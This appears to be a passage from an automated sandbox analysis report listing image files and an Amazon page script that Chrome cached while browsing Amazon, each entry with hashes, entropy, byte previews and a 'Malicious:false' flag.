                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x272, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):15158
                                                                                                                                                                                                                                                                      Entropy (8bit):7.948243953066359
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:gh/rcq/rh9HyRsc1vKcxV3M4dTSWnauPXTTMba:gh/frh981vB3M4dTSWNjqa
                                                                                                                                                                                                                                                                      MD5:92D513A8B8E0A0D89AF30CDC35982A0D
                                                                                                                                                                                                                                                                      SHA1:AE5A72D965DAAB35822082F17E7D2935C8EBF0E5
                                                                                                                                                                                                                                                                      SHA-256:F5D6A75CAD18E4892DC7D3D3CFDE6A4FE772311DEFC1F6995A34ADD1C2F4B953
                                                                                                                                                                                                                                                                      SHA-512:AF47DD043568DB31DAEBBD4273F31A293DAE100771C9130A038649D7030B103164D8DBA0F037DAE9166FD24241537152A82E7DC8DB03351B6BE9110C1FB3FDCF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5..................................................................,.............H..Q.L..5..T.|.$.^..,>.DN..W.................0.*....{.....W.<.'.;"...o....&D.Eh.I.e............#"9.n.2..1j...zX..D6....,|..~.e..>rs.Y.;.G<*....kul.k.z................tgi?.>..[..&...a..M.!v...td.Vf.fdo...*..e..6.....fP.....jF.S.g...........@.2..F.V..,e.......G.2k.._.biz'K7;P.de.gYX....^"YN..I+...F..,..............k./Kl.kh..=..#..9(..eG.......<...............9..M.............f[ c=S.V..].R..Ll.B.1gw..E..G.z..(.e.c.U....}6..*...............N[P....n.n....(.....H..).I.I..w}}.T.rM..G4^...W..rv=.63.T.........J-uW5a]vb*V.L. ...Ss...I....IyDe:..\..F.O./~L...l.i.aRy.G.I&.|R..G....3.......|.>...=(.5.....G..[.......1E-.R.7.Az.hu%=4.9I....^Xc,."...|...4.gt...>a2.Wj.1v...?D(.Q+.f.....-.._..C........YF.Y......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 256x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):30387
                                                                                                                                                                                                                                                                      Entropy (8bit):7.981444412426984
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:WmvSgYtao28i0aXrgajKTZS52NKJQSVV0QXuOWxs2cDb8yVun2uKZl9cSxz0Oc/E:W82soURl7uarb8Aunu196T/dR8alLU
                                                                                                                                                                                                                                                                      MD5:9A79CC15613E9CD015EFED950A864BA6
                                                                                                                                                                                                                                                                      SHA1:227CDDD7272E002F0CDBD4C3F90E5CC891C7C731
                                                                                                                                                                                                                                                                      SHA-256:8C72C0245A0773DE97ED84362E1A0F907876C9EF240C97DEA09725E24A186DF6
                                                                                                                                                                                                                                                                      SHA-512:C06E180893462ADD4492A29F41A4B5B4C5CA53573B0A80AB6E59BA6325A152E7A09169FFBBBD8B80C45B184505E577EE69F3FDB9DF85CAC10E82FF22FC5503EE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................y..^.*J+.....Z..Oe81.[i....].c...E.9..q....:.H.\....SPl/._... .X...|..;.&:.d..L...T... ?qU..DC.e+....#'...........K.....#..N.E....y~.M.....c7..;.......z.WBF..r.C...t...Cd.y.W.....(fI....b/ZN...^d......lD...%.=5E.._M.......W9.u.>M.n...&WPr.w.en....d.{&..P...".......UY....d.b,}@D.X<..W..T..a..5i..M...r@2<.[....*..8.X.Nah...........d!t/$....^.RX.~.(.|..~...G..l|(..b..!.] ..k....*.I.....C...^.?]".ol.y..E.lR....iJ.....+.(.r...b.o......|n.e....1s.v.F..#.^$.1ojv3..N...\.._..m...T^.........>..\...H6.55.P.....2(.....$K.[2f.h.,Z2u.W.!ZY... #.{.V4.|..m.zq..C........b..D..[.-|...DsP/.8L.a..P..+}.5?].r..I...k.:e-.v....~.....0H;}. ...%..$.qX7.;..A.......B.k..Q.N..I.1....3..,...gu.....F....n..1..}s.....M.&...?++....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D7782%26at%3D7782%26t%3D1724264961818%26csmtags%3DstartVL%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:7782
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10583
                                                                                                                                                                                                                                                                      Entropy (8bit):7.845554263936013
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:/5AIezBEz0mjbG89MPnxT9Z4gQTrEc5ouLEXsTMony/:/5AUnD9MPnJLwTj5r4Xszy/
                                                                                                                                                                                                                                                                      MD5:B525990F1116BBDDA23042C8FD03D75A
                                                                                                                                                                                                                                                                      SHA1:0C715F553F6AD046ED04D78881B3878ED7880C2F
                                                                                                                                                                                                                                                                      SHA-256:072F9F3B5D74BDAD5DC5619EED517D48B74FAC51BA3A1F8CE80E6CE8B5E95168
                                                                                                                                                                                                                                                                      SHA-512:E8DB8962C6B08F96833B6649B3D1A5C487A6E3AAA8149D51FD1F24448E7793C7719949A8E9D315329B0EDC6E4589421E62C2D9F7D95EE1E433DC0843A7A3C66A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31+hYY59fPL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2...............................................................,.........................................................................X.y........Q.O....1......F.G.f....Q...a...a...J.M>e..a.<..(.`.......... ~w..#....,.YC.{.'1.....^..,...#?a...-...d.\..-....+.u.....l.6c....~c....d...........9<..y.4.8m../4.=..k...>...3H.g;.p..5..s...ke...%2E.]......M....:.#/..............o.nr...ub...N...y.^.W!..{.rO..^..1.?..vH./..`........Il.......N.AmT.-3./.................4..?v.M.v\..&F..v...|.....~...7.......w.L..73G.$..s..P....6.K.E....qG.P............x.....C.F..hrOBG..9..q.t.r..r........._Y....~..<.:.L.3.d]...ZF.B..(=.n'~<............(|....q...y$....v..E._..5.)^.....%....2.\A...lG.{....g.Y...fJ.|......V............-..h...P.h.;...:Yk.....M}=x.EX.Y`.:.....|..cc...1..".ML...ZT........
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):31218
                                                                                                                                                                                                                                                                      Entropy (8bit):7.973719591940241
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1QfCCUFEpIb6G32VIESvJNXvtM3ZwIpNyieLE:hEZSvJBV+wQeLE
                                                                                                                                                                                                                                                                      MD5:16CFCECFDA7A15FB3AB0B1F3B5E4A983
                                                                                                                                                                                                                                                                      SHA1:0658971F8A134A4B2FDA0E193413945AF8365485
                                                                                                                                                                                                                                                                      SHA-256:874F7BA26AD0619E77806E1A410E6406A68B95F2937C30713FE72B1F098A94AA
                                                                                                                                                                                                                                                                      SHA-512:5C3A32C8F813149EDC21CE5D8BE0B064AC4CA33220D7B2747FC1E2D9C821CFC2BEA77A2DB7313F3AE1DA24201F337B59BD00F57575AB5EACD4B4D5B75A27EBA3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................":b..PU.p.....G4.dm.@j#"F0WGS..}^.U.*V...D..>[V....s[....G.....q8.J.......<..hI&|.=Z.r..\.....sc..W#..[.*.#..q....{.....".....l.......(...lpC<.J.#U.Tk..X.:I..1.....vdDr..8.W."..Ygr.*.F.$A.G.!_..$ux....F...F..:Id...Q.c...|....s.f/w.YA\......+..+d.%..K..s.C.....O.....+....H..c.'':.-E..n_....5....|......ga..K,..Q..:\..2c...#UG..K.;.6.?...e.o.../.a.9....9Lk...cP...5.$r....]+O..../Y.Z...Fs<'*\.^.Q...PjD...K.....it.^...b=.C.9....W.1.....#..s.4r..fGh.[.;..R(.2..G]\....T.s7.z.h..dM.M..I.....V..C.nX...*.OQ*.:N.V...5....V...E..Sy~z.#U.l.V...9..7.eV..........,..+....vy,..f..]..r.......Y%z!=....Q.^.nk..N.y.%.=.U..sW.....e..r..!H...I....?WC..^....n.,.....e...iU.'......='..@.gC....R..U.k_R.]/1.....xQ\.W...WoJ...g9..y...:.....a.u!..k..SO.f
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):34762
                                                                                                                                                                                                                                                                      Entropy (8bit):7.98146571060927
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:Ex9SlKcZbiFH1w1x6UMpXp0hEocbUtkUcVeATJF82rKfpg6tH/41:7FblxI0hEosAkUcVeATv82RIg1
                                                                                                                                                                                                                                                                      MD5:7587724D449169BC56D28116D61DCB49
                                                                                                                                                                                                                                                                      SHA1:C4457EEAC654D5FF46E57131F546322B40A1821E
                                                                                                                                                                                                                                                                      SHA-256:DD360D5F4AB2BD76E81D3EF331647AA476D3E9122BC8D6E6B25957DF98D65793
                                                                                                                                                                                                                                                                      SHA-512:F20A9F9E4FB9DF0CC230B8F5636EB2E7F1C7FD673846172DD7B170F8012FC63E18E92C474E85B40627183D16872A35BF64530A2A37BCB2D56DB35F94647FB5E0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........5....................................................................2p..~aF)....].Lk.-.^J.E.D..r...4...B.r...3....d...:.....R...8...K[I,.0Q4y+:../J...UHP....'..m..m(=....nsM.y<E`(..l.....+.}%....j.....[]...Y\..&.._M@p.&y..H......a(F.z../...d,d'T.a.R..W.@..<...x...7T..._,...Y.J.~...%.@..,.N.]...lq .p......]..2g.0e.WW...+oP....Sx..<Z..5A.5..1.U..>...5.....^.Q..S....C.yn....C..n....O ...;.M...P.^Y..}.........w.2..pe2G.I.E_..'...\.......m.4Y.+....<@........+....M.<.M..U../.f2... .....:...$.qa.s.{.z.s.D2....+..V+..^T{.I.o........:6I.3...pn..y#.....>SU/.Sh.4.q&<.\...',.@V.h..k.C...)..rq.H!..(..S.<.....;'......K..[.......1...%.%x.....5.@..QB.k<G..7.4..C.!.m .....T.e...15...[@.f%.#!..'. ..O&EX.I.y.Gn.m.A"R...c.z.s.A...#@m.!.=d"Q..V......O4...7m.<.....c8a.A.K.:......OS6_].a.L1...|.8w
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x316, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):21508
                                                                                                                                                                                                                                                                      Entropy (8bit):7.966186207967656
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:jrMqkvVd0g5//PPyg8f5oezzI6fBWGqOaRnM7R+cjihoOTJJ/11eYB:/DkvVX5n374VzI6fhjXl2bJJ/bec
                                                                                                                                                                                                                                                                      MD5:F251210BE9F01B8F803C811CAF716BA2
                                                                                                                                                                                                                                                                      SHA1:FA2B8B5DAD1457B4E16D9F1E5C8165F7C3C67020
                                                                                                                                                                                                                                                                      SHA-256:BC80F49E1220A06CF13E602AF1F842E1A69A9C3B31C9FFF53965E3859A6146AD
                                                                                                                                                                                                                                                                      SHA-512:328E287ED041388FF69D7247304BE5876F0A41017CC2008B1954B3AC63AE0F4A3F3ADAB2057390DEE98EB97A9A3C4084D004B7C4FA12B77A23AA40BF66ACE9EE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......<.@.."..........6.............................................................................@.bs.O.M`..I......n..~w.$E...!.-{/4.................#...*..kz.cW.C..K6K.u.tuk......c...`5s-.{2...y...m.6.y.q........~h......y.....oEKC......WE7W.Dg..m.......)..9$....k....=...Ac....[!.7....E...}..m..Z...:..NR.Jr.....7...7X...4.....u...k.b."K].5..5.5...nr....'I.o[.QN.9....F.Z.z.d....5.9.7.Il..({......>vT....:../9T.F..8..~.n~X..Fr2N0.?wc.={.....w!.!.3:\.m..n.6.-...!i.j...Dn.....;_qfz.qI.U/......>......d..f.*..%P..y..~..a..s....B&V",...b..2.nnk...[...j.,...rP.msg..T..O....}H....F...K/..K.k.v..<....s..v.".g..4..SZ.....2......0..~..Q..I.<.*..\..q2.k...H.|9..5+.'#].....K.Wi.......~..=.b.....o5.N9.)......7..@./T.0..+..loR.....(6~..\..(A.BE.u.....L:.....p..4U.....%....Y.......P.-..U..Y*...;....V.tca.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):285
                                                                                                                                                                                                                                                                      Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                      MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                      SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                      SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                      SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26ctb%3D1%26m%3D1%26sc%3DSX0TR1HXR3TVBG1JQK3B%26pc%3D12250%26at%3D12250%26t%3D1724264979090%26csmtags%3Dcsm-feature-touch-enabled%3Afalse%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26lob%3D1:12250
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x286, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):18924
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958469858536003
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:rofzytVJPdXByZnpNeLzOWJbWVso8Mdzbf1crNQUDdpV+7A:kLyxGZnszOobWVsoJ1WBQUBpV+E
                                                                                                                                                                                                                                                                      MD5:17AFCC07F432A965E4073230B84158FC
                                                                                                                                                                                                                                                                      SHA1:C103CA76BB83EE33D9A40058E5B25DEA8351060B
                                                                                                                                                                                                                                                                      SHA-256:05A4E8F008737878C409EB189337A3180AF14B537DBFC723F9DE43A81CF6397F
                                                                                                                                                                                                                                                                      SHA-512:C73A2D763209DEE085AA4B9222A0D984C68256FB8A67882183EFE840AB9D9CED1F7D6A661D7C08A05E0BD99CF50FD493D4738A29328B6EF96CD2695EED7C554A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71XEfI+E++L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5..........................................................................f..,.4G...&.R.3..]i.^...VUE.j.;......k6]Xa....?.............85..o..Jg....g....,T.,3k.a.....^k.%.yS...m..#O..-z.#yU.]..m..Mww#.*H......\.).>u].N-........x..Q........,..."...nn..E.I...Q&.u.K.m...f.W.w...k.kW.....:v...WZ.kt........#..@er!..u.........y.4v.$...Q%.....Z..B.j...C.7".Q..T.....K3.|..we0.?6.......t....o.@.P..%Lov.Xwljx.....l...c..k.'.N.a...DS........vk.l.^f.y`...zT......f.%.f.a.m.c.(f.d.)..sv..../gT.b.9...M..=?L.t.T.N.....A.l.U.....=..W6[..)t..vU.....$X.....-........+[+I..}K..s.+.U?...#."....,.~.....D.w=n..}.b..."=.."..."[%Y.u..k.zc.........d....88..z..L..t.^U......I...'....t^\...."d.@......@.5...!q....b..4.b5;...q.o.N..R.,.b8z.y..\[..+6.Im.+[..o.R.e..V3Vz..9.aj.......].o...=*E..(..o......W\D..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):44691
                                                                                                                                                                                                                                                                      Entropy (8bit):7.952273097635305
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:XFzU650NkjT5c830bN3wk2vAzQgmZmYE3mf/oqcXXXXjTIHUPkzPM6:VY68kjT5l3AN3lV1dYE3mf/3OEHUkt
                                                                                                                                                                                                                                                                      MD5:2A1D0E91B5AC1F0A6A394F3964B311CC
                                                                                                                                                                                                                                                                      SHA1:A85F7BC2516B1B31B6A88B4792FD0BBEF4618C31
                                                                                                                                                                                                                                                                      SHA-256:26482FF03EFD85FEE3F189A3C2BA484774818985006DC41221EBB42660F2B5A1
                                                                                                                                                                                                                                                                      SHA-512:DE78263836DEE483A42AC5964BDCBB7AFF8C9B6BA9F87869045CF3AF82D43C9696A5771B3BA48842AE482E7D2A5E8EF0B962864E5D7B83232F97A46FA9AC9D38
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d.............................................................................................................!1"A..2Qa..#Uq.BRr.....3bt.....$67Sc.....%Csu........8DTd..45E..........................!.1A.."Qaq.2RS.......#B......3Cbr..$4s....c..%5T.............?...@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@.....@(......P..@(......P..@;u4....M.a%7K.V\O..\..>....[.>..V.)..,.oC&....X.Q..Gh(yL..\U......*..F.4y!.....M...6....dks.(.$..cJ...U...O..iK.K...G....l5...0..$....FO..Z.:.#.Vt9..[..|...Z+{..w.....}..3...?.J.*<......2U.p..........."...jE....R.E....>..>..n)'..+.....G....R...V.....r....?I&;....l.CmE.J`^.%...-{"...fR'..h.2.......W..(~....3.e5..q..%'...g-...TBn.5.<..@s.....}^EK.T^..o.cOa../a... .qq!2$H..^RXQ..Y...Z.....rS.....6Ex.I.?........e.F.O]....}..p..iq....y.G..5(T.....b...@(......P..@(.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (609)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):26743
                                                                                                                                                                                                                                                                      Entropy (8bit):5.347138627237308
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:f1It/R8qLTNor9iviwO2AMVdnjnTzyFVBIXO6ZkLvnP7w2VxLQ/E2pNeHmnqjUYR:acmgkJVd/zMV56ZkLvxVx8fXoKA
                                                                                                                                                                                                                                                                      MD5:ABC38D8868C37FAF892916C89A4E5FBC
                                                                                                                                                                                                                                                                      SHA1:469738064CD0AEABAE8B4DAA2B679B587310134A
                                                                                                                                                                                                                                                                      SHA-256:FA8ED1F8E3AE60AB5AE81058050107B99A2AE4E5A34192BBAE3E41D35EC2693F
                                                                                                                                                                                                                                                                      SHA-512:158840D371AF384897DC3E11E2634F35FEFC895756A31CD4CFAE91325561EFF5CAF5CD4F125A16642BCD2AE6D5073467BF5390B63704A3DC84ED8525FB84C4BC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(e){var k=window.AmazonUIPageJS||window.P,l=k._namespace||k.attributeErrors,f=l?l("AmazonHomepageCardAssets",""):k;f.guardFatal?f.guardFatal(e)(f,window):f.execute(function(){e(f,window)})})(function(e,k,l){e.register("gw-video-orchestrator",function(){function f(a,b,g){return 0<a?Math.min(g-a,b-a):0<b?Math.min(b,g):0}function n(a){var b=k.innerHeight||document.documentElement.clientHeight,g=k.innerWidth||document.documentElement.clientWidth;a=a.getBoundingClientRect();var b=f(a.top,a.bottom,.b),g=f(a.left,a.right,g),c=0;if(0<b||0<g)c=b*g;return Math.min(1,Math.max(0,c/((a.bottom-a.top)*(a.right-a.left))))}function p(a,b){return a&&1===a.nodeType&&(a.offsetWidth||a.offsetHeight||a.getClientRects().length)?n(a)<b?!1:!0:!1}function m(a){a=q(a);a!==c&&(c&&c.callback(!1),(c=a)&&"hidden"!==document.visibilityState&&c.callback(!0))}function q(a){if(a)for(var b=d.length;b--;)if(d[b].element===a)return d[b]}function r(a,b){return b.priority-a.priority||n(b.element)-n(a.element)||(a.el
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):35836
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972042548028732
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:17YnQXApuSZCS87gktBYNADhEXehPtMMPBs:RYnNpuS6gcWNE/1tMMps
                                                                                                                                                                                                                                                                      MD5:F583AD80C797A9857C29F8AEAB9E866C
                                                                                                                                                                                                                                                                      SHA1:9BC41B76F37E2DEC211F6C1A38139C3A9D06A737
                                                                                                                                                                                                                                                                      SHA-256:52BED5421AF71ED3605178797F2102D5AEB7EFB433BBA5CFF56A15B8E4976D44
                                                                                                                                                                                                                                                                      SHA-512:90B740E950C4E9BD4B835984CC6CEDF11189C3F9E3D90F96383467F1528D8332A080B40171A54E0EE1004E3F536154F5CAA2A0B970D1E18DA0632F800301D915
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Activities-Swimming-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...................................................+.J.k^.~.M*Ea.UB.7{.k...Y.V.5...d.f...4Z.ZeMk.fk...R.7n......c..".........*..58^t...=8...2.RV]...Z....JR.b....B......\..I..t...C..V&.Rk{.U.0..9.R..I.RSV..w.ak..t..f.VZ(..|....Zb/E.u!U..4....-.Z.K.$Y..a6...%4.....Z..k...Q.J.fX.EK..c..%Qi"-y.Wf0..{.....U.X.B.f"..0]K.X...e.5.....P..Z.2iR. ..!....I....m.^%Y..Y$.@HY..Y.P.......f.._.+....2.{..V..&..].cE""l.Ks..t:q..l...{...U.....I..N....*.+Z..t..c../..5..o.....kZn.].....++...c.......kw{..2..mkZ.Q.6...<6.)..*.)......../.4.W........m{^..F...fu...k1.Fz;g........5.H..f.>..e....H..B3].......wY|..'.../-.C..o@...b..%3.uk{.]uuz.K.Izt.9....~NX.....Y.....V.5G./9rg..e....#..|_....SBz=.....M.G..f..9.iM.$-..#"..d3G....ia5d../...e....k.eQ!^$u.a.uBql.kh...4..D.~N.+'K.Q.^...,.S:..nl........9...j
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 319x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):29833
                                                                                                                                                                                                                                                                      Entropy (8bit):7.976488256817726
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:/t2ShEov+tDaQF1Y5VSxztARP8DY+5MsKDLq:MO2CVSxz0P8DYUMsKDG
                                                                                                                                                                                                                                                                      MD5:CE3F163F21702D26EAF2928CF67FE786
                                                                                                                                                                                                                                                                      SHA1:0500B43365F63BF474784B1B02A08ADCC9220FA4
                                                                                                                                                                                                                                                                      SHA-256:3D27075D354C28E6EA2024065E127593EEE66690915D1BBC15320CE4B85F5483
                                                                                                                                                                                                                                                                      SHA-512:9C597CED086906A74822DECA7A1B8B767875A9E85E81E627495091E2901D9475E6135D4AAA2E986E93112A7DC5398EB352F1D5DD2CA34E946B0E74A5197653D2
                                                                                                                                                                                                                                                                      Malicious:false
